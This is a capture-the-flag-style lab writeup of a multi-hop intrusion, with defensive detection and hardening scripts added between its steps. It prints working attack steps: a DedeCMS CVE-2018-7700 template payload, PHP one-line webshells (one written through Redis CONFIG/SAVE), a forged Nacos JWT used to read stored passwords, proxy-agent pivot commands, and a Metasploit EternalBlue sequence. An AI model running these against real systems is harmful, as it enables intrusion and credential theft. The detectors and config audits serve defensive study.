
External network information gathering
Scanned the ports; brute forcing the database, FTP and the other exposed services yielded no passwords.

Looked at the web site: the version is DedeCMS_V57_UTF8_SP2
http://192.168.111.20:8080/

External vulnerability exploitation
It is an old version with plenty of n-days; look them up yourself.
http://192.168.111.20:8080/dede/login.php

Logged in with the weak credentials admin/admin

DedeCMS V5.7 backend arbitrary code execution [CVE-2018-7700]
Vulnerability analysis: https://xz.aliyun.com/t/2224
Construct the payload:
http://192.168.111.20:8080/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}system(whoami);{/dede:field}

Here I simply changed the allowed attachment types and uploaded a one-line webshell.


Upload the file


Connect
http://192.168.111.20:8080/uploads/soft/251107/1_1437493351.php
Password: pass
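From the defender's side, both steps above leave a clear trace in the web server access log: a request to dede/tag_test_action.php whose partcode carries a runphp attribute, and PHP being executed out of the uploads directory. The following detector is an added example written for this page, not code from the post or from DedeCMS; the log lines are constructed in combined log format to mirror the two requests, and the upload directory and extension lists are assumptions you should adapt to your install.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed access-log lines in combined format. They mirror the two
# techniques above but are not taken from the original post.
SAMPLE_LOG = """\
192.168.111.25 - - [07/Nov/2025:15:40:01 +0800] "GET /dede/login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.111.25 - - [07/Nov/2025:15:41:12 +0800] "GET /dede/tag_test_action.php?url=a&token=&partcode=%7Bdede:field%20name=%27source%27%20runphp=%27yes%27%7Dsystem(whoami);%7B/dede:field%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.111.25 - - [07/Nov/2025:15:43:30 +0800] "POST /uploads/soft/251107/1_1437493351.php HTTP/1.1" 200 73 "-" "Mozilla/5.0"
10.0.0.7 - - [07/Nov/2025:15:44:00 +0800] "GET /uploads/soft/251107/manual.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed layout: DedeCMS keeps user uploads under /uploads/; a PHP file
# being served from there is abnormal regardless of who requested it.
UPLOAD_DIRS = ("/uploads/",)
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def classify(line):
    """Parse one access-log line and return the alert tags it triggers (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    u = urlparse(m.group("target"))
    path = u.path.lower()
    query = unquote(u.query).lower()
    alerts = []
    # CVE-2018-7700 abuse: the tag tester asked to render a template tag with runphp set
    if path.endswith("/dede/tag_test_action.php") and "runphp=" in query:
        alerts.append("dedecms-tag-runphp")
    # Webshell traffic: PHP executed out of the upload directory
    if path.startswith(UPLOAD_DIRS) and path.endswith(PHP_EXT):
        alerts.append("php-in-upload-dir")
    return {"ip": m.group("ip"), "method": m.group("method"), "path": u.path, "alerts": alerts}


def scan(log_text):
    """Return only the parsed entries that raised at least one alert."""
    return [r for r in (classify(l) for l in log_text.splitlines()) if r and r["alerts"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["path"], ",".join(hit["alerts"]))
```

Feed it the real access log instead of SAMPLE_LOG; the PDF request shows that ordinary downloads from the upload directory stay silent, so the rule can run continuously without drowning in noise. The durable fix is the one the post implies in reverse: keep the attachment whitelist strict and configure the web server to refuse to execute PHP under the uploads tree at all.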

First layer of the internal network
Not much information here; the host has two NICs, so set up a proxy and keep scanning.
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >ipconfig

Windows IP 配置

以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::2161:f12b:1258:f6dd%16
   IPv4 地址 . . . . . . . . . . . . : 192.168.111.20
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

以太网适配器 Ethernet2:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::880f:3a86:aca9:e8b6%13
   IPv4 地址 . . . . . . . . . . . . : 192.168.52.2
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >
NULL
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >whoami
nt authority\system
C:/phpstudy_pro/WWW/dedecms/uploads/soft/251107/ >
Upload windows_x64_agent.exe and bring up a proxy
windows_x64_agent.exe -c 192.168.111.25:9999 -s pass --reconnect 10
./macos_arm64_admin -l 9999 -s pass

use 0
socks 55667 123 123

socks5://123:123@127.0.0.1:55667
Bring out the trusty fscan
sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55667 -h 192.168.52.2/24

aqi@aqideMacBook-Pro fscan % sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55667 -h 192.168.52.2/24
Password:
fscan version: 1.8.4
Socks5Proxy: socks5://123:123@127.0.0.1:55667
start infoscan
192.168.52.2:21 open
192.168.52.4:22 open
192.168.52.4:80 open
192.168.52.2:135 open
192.168.52.2:139 open
192.168.52.2:445 open
192.168.52.2:3306 open
192.168.52.4:6379 open
192.168.52.2:8080 open
192.168.52.4:8848 open
[*] alive ports len is: 10
start vulscan
[*] WebTitle http://192.168.52.4 code:200 len:0 title:None
[*] WebTitle http://192.168.52.2:8080 code:200 len:14405 title:我的网站
[+] InfoScan http://192.168.52.2:8080 [CMS]
[*] WebTitle http://192.168.52.4:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos
[+] PocScan http://192.168.52.2:8080 poc-yaml-dedecms-cve-2018-6910
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
已完成 9/10
[-] redis 192.168.52.4:6379 a12345 <nil>
已完成 10/10
[*] 扫描结束,耗时: 17m57.835105167s
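Raw fscan output like the block above is easy to read once but awkward to act on, and both scans in this writeup produce the same line shapes. The parser below is an added example written for this page (not part of fscan or of the original post): it groups the "host:port open", "[*] WebTitle" and "[+] PocScan" lines by host and orders hosts for remediation, PoC hits first. The sample lines are re-typed in fscan's format after the scan above, and the table of notable ports is an assumption you should tune to your environment.

```python
import re
from urllib.parse import urlparse

# Constructed excerpt in the style of fscan 1.8.x output, modelled on the scan
# above; not copied verbatim from the original post.
SAMPLE_OUTPUT = """\
192.168.52.2:21 open
192.168.52.4:22 open
192.168.52.4:80 open
192.168.52.2:445 open
192.168.52.2:8080 open
192.168.52.4:6379 open
192.168.52.4:8848 open
[*] alive ports len is: 7
[*] WebTitle http://192.168.52.4 code:200 len:0 title:None
[*] WebTitle http://192.168.52.2:8080 code:200 len:14405 title:我的网站
[*] WebTitle http://192.168.52.4:8848 code:404 len:431 title:HTTP Status 404 - Not Found
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos
[+] PocScan http://192.168.52.2:8080 poc-yaml-dedecms-cve-2018-6910
[+] PocScan http://192.168.52.4:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
"""

OPEN_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle (\S+) code:(\d+) len:(\d+) title:(.*)$")
POC_RE = re.compile(r"^\[\+\] PocScan (\S+) (\S+)")

# Assumed list of services worth a look even without a PoC hit, because they
# are the usual weak-credential targets.
NOTABLE_PORTS = {21: "ftp", 445: "smb", 3306: "mysql", 6379: "redis", 8848: "nacos"}


def _entry(hosts, host):
    return hosts.setdefault(host, {"ports": set(), "web": {}, "pocs": []})


def parse_fscan(text):
    """Group fscan result lines by host: open ports, web titles and PoC hits."""
    hosts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := OPEN_RE.match(line):
            _entry(hosts, m[1])["ports"].add(int(m[2]))
        elif m := TITLE_RE.match(line):
            _entry(hosts, urlparse(m[1]).hostname)["web"][m[1]] = {"code": int(m[2]), "title": m[4]}
        elif m := POC_RE.match(line):
            _entry(hosts, urlparse(m[1]).hostname)["pocs"].append(m[2])
    return hosts


def triage(hosts):
    """Order hosts for remediation: most PoC hits first, then most notable services.

    Returns a list of (host, poc_names, notable_service_names).
    """
    def score(item):
        _host, info = item
        return (len(info["pocs"]), sum(1 for p in info["ports"] if p in NOTABLE_PORTS))

    return [
        (host, info["pocs"], sorted(NOTABLE_PORTS[p] for p in info["ports"] if p in NOTABLE_PORTS))
        for host, info in sorted(hosts.items(), key=score, reverse=True)
    ]


if __name__ == "__main__":
    for host, pocs, services in triage(parse_fscan(SAMPLE_OUTPUT)):
        print(host, pocs, services)
```

Pipe a saved scan into parse_fscan and the output becomes a ticket list: in this writeup 192.168.52.4 surfaces first because it carries two Nacos PoC hits plus Redis, and 192.168.52.2 follows with the DedeCMS hit and SMB/FTP exposure.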
Nacos
The Nacos hit reported unauthenticated access and an authentication bypass; a weak-password login attempt failed.
http://192.168.52.4:8848/nacos/#/login

Using a JWT generated with the default key, the configuration list can be read directly; it contains a flag and a password:
P@ssw0rd_sec
GET /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: 192.168.52.4:8848
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q
Referer: http://192.168.52.4:8848/nacos/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Date: Fri, 07 Nov 2025 07:47:15 GMT
Keep-Alive: timeout=60
Connection: keep-alive
Content-Length: 513

{"totalCount":3,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"id":"831059083068456960","dataId":"123","group":"DEFAULT_GROUP","content":"123","md5":null,"tenant":"","appName":"","type":"text"},{"id":"831060879946039296","dataId":"flag","group":"DEFAULT_GROUP","content":"flag{7b4b73d7e9ef1c5959efbb820de2495e}","md5":null,"tenant":"","appName":"","type":"text"},{"id":"831061269961785344","dataId":"password","group":"DEFAULT_GROUP","content":"P@ssw0rd_sec","md5":null,"tenant":"","appName":"","type":"text"}]}
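The token in that request is worth decoding: it is an HS256 JWT whose payload is {"sub":"nacos","exp":9999999999}, an expiry in the year 2286 that no login flow would issue. Two checks therefore catch this class of access from the Nacos side: an absurd lifetime, and a signature that verifies under the shipped default key. The audit below is an added example for this page, not Nacos code or code from the post. It does not contain the default key value (the page does not show it); KNOWN_KEYS is a placeholder you fill from your own deployment's nacos.core.auth.default.token.secret.key, base64-decoded as Nacos does before signing, and the thirty-day lifetime threshold is an assumption.

```python
import base64
import hashlib
import hmac
import json
import time

# The accessToken from the request above.
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0."
              "00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q")

# Assumed policy: flag any token that would still be valid a month from now.
MAX_LIFETIME_SECONDS = 30 * 24 * 3600

# Placeholder only: put the base64-decoded value of your deployment's
# nacos.core.auth.default.token.secret.key here (and any old keys you rotated away from).
KNOWN_KEYS = {"placeholder-default": b"REPLACE-WITH-YOUR-DEPLOYMENTS-DEFAULT-KEY-BYTES"}


def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_claims(token):
    """Parse header and payload without verifying the signature."""
    header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def signed_with(token, key):
    """True if the HS256 signature verifies under `key` (raw key bytes), compared in constant time."""
    header, payload, sig = token.split(".")
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_encode(mac), sig)


def make_token(claims, key):
    """Build an HS256 token under `key`; used to create test material for the audit."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(mac)}"


def audit(token, known_keys, now=None):
    """Return finding tags for one captured accessToken (empty list = nothing suspicious)."""
    now = time.time() if now is None else now
    header, claims = decode_claims(token)
    findings = []
    if header.get("alg") != "HS256":
        findings.append(f"unexpected-alg:{header.get('alg')}")
    exp = claims.get("exp")
    if exp is None:
        findings.append("no-exp")
    elif exp - now > MAX_LIFETIME_SECONDS:
        findings.append("exp-too-far")
    for label, key in known_keys.items():
        if signed_with(token, key):
            findings.append(f"signed-with-known-key:{label}")
    return findings


if __name__ == "__main__":
    print(decode_claims(PAGE_TOKEN)[1])
    print(audit(PAGE_TOKEN, KNOWN_KEYS))
```

Run it over accessToken values pulled from the Nacos access log or a reverse proxy; any hit on "signed-with-known-key" means the secret was never changed from the default and must be rotated, and "exp-too-far" alone is enough to block the request at the proxy since the server's own login never issues such tokens.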

Tried the recovered password against redis and ssh in turn.
The redis connection succeeded.

Redis RCE
Directory scanning of the port 80 site that fscan found turned up phpinfo:
http://192.168.52.4/phpinfo.php


That reveals the web root path; write a file through redis:
config set dir /var/www/html/
config set dbfilename redis.php
set webshell "<?php @eval($_POST['pass']);?>"
save

http://192.168.52.4/redis.php
Password: pass
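Every step of that redis sequence depends on a configuration choice the server owner controls: an interface binding that reaches the web tier, no password (or one reused from another service), the CONFIG command left available, and nothing stopping the dump file from landing under the document root. The checker below is an added example for this page, not code from the post or from Redis; it parses redis.conf fragments and reports which of those conditions hold. Both fragments are constructed, and the list of web-root prefixes is an assumption to adjust for your hosts.

```python
# Constructed redis.conf fragments (not from the original post): the first is
# the kind of configuration that lets a client retarget the dump file into a
# web root; the second closes each path.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html/
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-PASSWORD
dir /var/lib/redis
rename-command CONFIG ""
rename-command SAVE ""
"""

# Assumed document-root prefixes; the dump file must never land under one.
WEB_ROOTS = ("/var/www", "/usr/share/nginx", "/srv/http", "/srv/www")


def parse_conf(text):
    """Map directive -> list of values (directives such as rename-command may repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf


def renamed(conf, command):
    """True if `command` has a rename-command entry (renamed or disabled with "")."""
    return any(v.split()[0].upper() == command for v in conf.get("rename-command", []) if v.split())


def audit(text):
    """Return finding tags in a fixed order; an empty list means no check fired."""
    c = parse_conf(text)
    findings = []
    binds = c.get("bind", ["0.0.0.0"])  # no bind directive means listen on every interface
    addrs = {a for v in binds for a in v.split()}
    if addrs & {"0.0.0.0", "*", "::"}:
        findings.append("bind-all-interfaces")
    if c.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode-off")
    if "requirepass" not in c:
        findings.append("no-requirepass")
    if any(d.rstrip("/").startswith(WEB_ROOTS) for d in c.get("dir", [])):
        findings.append("dir-in-web-root")
    if not renamed(c, "CONFIG"):
        findings.append("config-command-exposed")
    return findings


if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

On Redis 6 and later, ACL users with the dangerous command category removed are the supported replacement for rename-command, but the checks that matter most here are the first four: a password that is not shared with other services (the post's pivot only worked because the same string was stored in Nacos), a bind limited to the consumers that need it, and a dump directory the web server never reads.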

Found a flag in the root directory.

Second layer of the internal network
Upload linux_x64_agent and bring up a proxy
chmod 777 linux_x64_agent
(www-data:/var/www/html) $ chmod 777 linux_x64_agent
(www-data:/var/www/html) $ ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.52.4  netmask 255.255.255.0  broadcast 192.168.52.255
        inet6 fe80::250:56ff:feb1:7cb6  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b1:7c:b6  txqueuelen 1000  (Ethernet)
        RX packets 18652  bytes 11466587 (11.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12464  bytes 2721046 (2.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens37: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.37.2  netmask 255.255.255.0  broadcast 192.168.37.255
        inet6 fe80::250:56ff:feb1:37bb  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b1:37:bb  txqueuelen 1000  (Ethernet)
        RX packets 277  bytes 34000 (34.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 17  bytes 1276 (1.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 66915  bytes 5437410 (5.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 66915  bytes 5437410 (5.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Open a listening port on the local machine
listen
9999

linux_x64_agent -c 192.168.52.2:9999 -s pass --reconnect 10

use 1
socks 55668 123 123

socks5://123:123@127.0.0.1:55668
fscan again
sudo ./fscan_mac_arm64 -socks5 123:123@127.0.0.1:55668 -h 192.168.37.2/24

One host, 192.168.37.6, is vulnerable to MS17-010.
EternalBlue
Open kali and hook it up to the local proxy

sudo vi /etc/proxychains4.conf

Here msf has to use a bind (forward) connection, since the target cannot reach back through the proxy chain:
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.37.6
set lport 4444
run

Finally got the flag on the desktop.

flag{9dedc7f251eb6f0c1b7bd779bb799d34}